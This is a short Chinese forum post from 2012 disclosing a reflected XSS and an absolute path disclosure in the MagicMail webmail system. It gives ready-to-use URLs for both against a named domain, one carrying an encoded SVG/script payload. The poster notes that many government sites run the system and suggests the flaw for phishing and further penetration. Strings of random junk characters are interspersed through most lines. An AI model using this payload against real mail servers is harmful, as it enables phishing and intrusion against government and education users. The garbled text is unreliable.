今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
% C( h5 _* i A" z( o8 o0 Z" l- o
- V- L" I" t$ H
- Y8 x) f/ u0 A4 |+ J! O/ ?包含 一个反射性XSS 以及 绝对路径泄漏
. F6 D5 s- ~/ e; c% Y9 I看了看 貌似全部是linux的。
9 \ J6 |$ E; u# A/ q1 b1 `0 l
: E: K( ]0 e/ D+ j& A& _/ x关键字:迈捷邮件系统 by MagicMail- ^. m: A1 l" n3 t' i
6 \/ ^) f& U/ F7 y3 p9 I" M0 ?
可以看到很多政府网站都用这个邮件系统6 P l6 p3 Z6 {
7 |3 _2 q) m; S. i
绝对路径 http://madman.in/index.php?login_type=declare&language=
, N6 C' P3 N: Q& d; }! L
1 Q: b& g& s! ?, v; P" X) X3 [. `) A/ H
9 H9 r% C1 q3 w: I# b
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E- w" c; x9 T0 n4 z
3 x' I) |( X0 e4 u
& `/ t) U. |% S/ q# q/ ?& P
f2 K( }/ H. y. r3 l. Q$ h/ _
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等3 S. p8 K( T0 G0 ]7 j2 c' U
9 A& a* ]" d+ i, N2 v
修复方案:看官方补丁吧。2 m# F8 Z9 `! K; {1 W' i
|
发表于 2012-11-9 20:38:41
收藏
支持
反对